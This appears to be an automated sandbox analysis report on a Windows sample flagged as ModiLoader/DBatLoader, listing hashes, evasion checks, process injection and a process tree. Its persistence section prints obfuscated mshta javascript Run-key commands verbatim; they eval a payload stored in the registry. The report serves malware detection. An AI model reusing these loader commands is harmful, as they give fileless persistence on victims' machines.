Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
30/10/2022, 12:47
Static task
static1
Behavioral task
behavioral1
Sample
71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe
Resource
win7-20220901-en
windows7-x64
16 signatures
150 seconds
Behavioral task
behavioral2
Sample
71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe
Resource
win10v2004-20220812-en
windows10-2004-x64
15 signatures
150 seconds
General
-
Target
71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe
-
Size
320KB
-
MD5
4033b6956050bcc1d1b025dfb5ed1150
-
SHA1
16e94167fc2c5fb4bd94890bfdcebbf09fc7ed71
-
SHA256
71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047
-
SHA512
e7ac6f1170ba5110d653aaba0f0773da5db4c071142f6c199449ae97ede5643e647fbd93c3502548c8f21e3b409d426c3a4ae3858aa5267c3de57915794bd2f9
-
SSDEEP
6144:zxowmzBVd3QDnxDZ2mKRDQ7oL7M5IjZb8CArDTCAR4RzJM:zxlmzjWDuvDQQ7MIVb8jfCw
Score
10/10
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions svchost.exe -
ModiLoader Second Stage 9 IoCs
resource yara_rule behavioral2/memory/4800-133-0x0000000000400000-0x0000000001400000-memory.dmp modiloader_stage2 behavioral2/memory/4800-136-0x0000000000400000-0x0000000001400000-memory.dmp modiloader_stage2 behavioral2/memory/4800-137-0x0000000000400000-0x0000000000433000-memory.dmp modiloader_stage2 behavioral2/memory/4136-139-0x0000000000A30000-0x0000000000AE2000-memory.dmp modiloader_stage2 behavioral2/memory/2420-143-0x0000000001200000-0x00000000012B2000-memory.dmp modiloader_stage2 behavioral2/memory/4492-146-0x0000000001200000-0x00000000012B2000-memory.dmp modiloader_stage2 behavioral2/memory/4136-147-0x0000000000A30000-0x0000000000AE2000-memory.dmp modiloader_stage2 behavioral2/memory/4492-148-0x0000000001200000-0x00000000012B2000-memory.dmp modiloader_stage2 behavioral2/memory/2420-149-0x0000000001200000-0x00000000012B2000-memory.dmp modiloader_stage2 -
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:S9pzOj1G=\"1LNax\";l9A3=new%20ActiveXObject(\"WScript.Shell\");KSWL1Cvq=\"FeRPmg\";b0cQQ=l9A3.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\a6dfe80c\\\\6b9191eb\");Jrfk9wf=\"gwmhZ\";eval(b0cQQ);WhkPr1Etd=\"rjGy1\";" svchost.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools svchost.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:udKR0Vp=\"j3jTD8\";G8l=new%20ActiveXObject(\"WScript.Shell\");RLVXiL7Vs=\"V\";R2oML=G8l.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\a6dfe80c\\\\6b9191eb\");q4kpGUCwE2=\"Q5BtY\";eval(R2oML);cKM7lEK=\"x9BdJMqb\";" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:bEX5I0Oop=\"s16h\";Ta9=new%20ActiveXObject(\"WScript.Shell\");Ph9zsrHyw=\"d1eLp\";z3Ay4e=Ta9.RegRead(\"HKCU\\\\software\\\\a6dfe80c\\\\6b9191eb\");LFH47axsS=\"pI\";eval(z3Ay4e);g8qDK2OC=\"vAN51P3l\";" svchost.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4932 set thread context of 4800 4932 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 84 -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\International svchost.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\svchost.exe = "0" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\explorer.exe = "0" svchost.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\svchost.exe = "0" svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\explorer.exe = "0" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4932 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 4932 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 4800 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 4800 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 4800 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 4800 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 4800 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 4800 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 4800 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 4800 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 4800 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 4800 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 4800 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 4800 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 4800 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 4800 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe 4136 svchost.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4932 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 4932 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 4932 wrote to memory of 4800 4932 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 84 PID 4932 wrote to memory of 4800 4932 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 84 PID 4932 wrote to memory of 4800 4932 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 84 PID 4932 wrote to memory of 4800 4932 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 84 PID 4932 wrote to memory of 4800 4932 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 84 PID 4932 wrote to memory of 4800 4932 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 84 PID 4932 wrote to memory of 4800 4932 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 84 PID 4932 wrote to memory of 4800 4932 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 84 PID 4932 wrote to memory of 4800 4932 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 84 PID 4932 wrote to memory of 4800 4932 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 84 PID 4932 wrote to memory of 4800 4932 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 84 PID 4800 wrote to memory of 4136 4800 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 85 PID 4800 wrote to memory of 4136 4800 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 85 PID 4800 wrote to memory of 4136 4800 71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe 85 PID 4136 wrote to memory of 2420 4136 svchost.exe 86 PID 4136 wrote to memory of 2420 4136 svchost.exe 86 PID 4136 wrote to memory of 2420 4136 svchost.exe 86 PID 4136 wrote to memory of 4492 4136 svchost.exe 87 PID 4136 wrote to memory of 4492 4136 svchost.exe 87 PID 4136 wrote to memory of 4492 4136 svchost.exe 87
Processes
-
C:\Users\Admin\AppData\Local\Temp\71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe"C:\Users\Admin\AppData\Local\Temp\71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Users\Admin\AppData\Local\Temp\71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exeC:\Users\Admin\AppData\Local\Temp\71d0cc107714d609f9899c6b3f5042fa30b8e98631c2a953b63b0f2d5c31d047.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Windows\SysWOW64\svchost.exe"svchost.exe"3⤵
- Looks for VirtualBox Guest Additions in registry
- Adds policy Run key to start application
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Adds Run key to start application
- Maps connected drives based on registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4136 -
C:\Windows\SysWOW64\svchost.exe"C:\Windows\SysWOW64\svchost.exe"4⤵PID:2420
-
-
C:\Windows\SysWOW64\explorer.exe"explorer.exe"4⤵PID:4492
-
-
-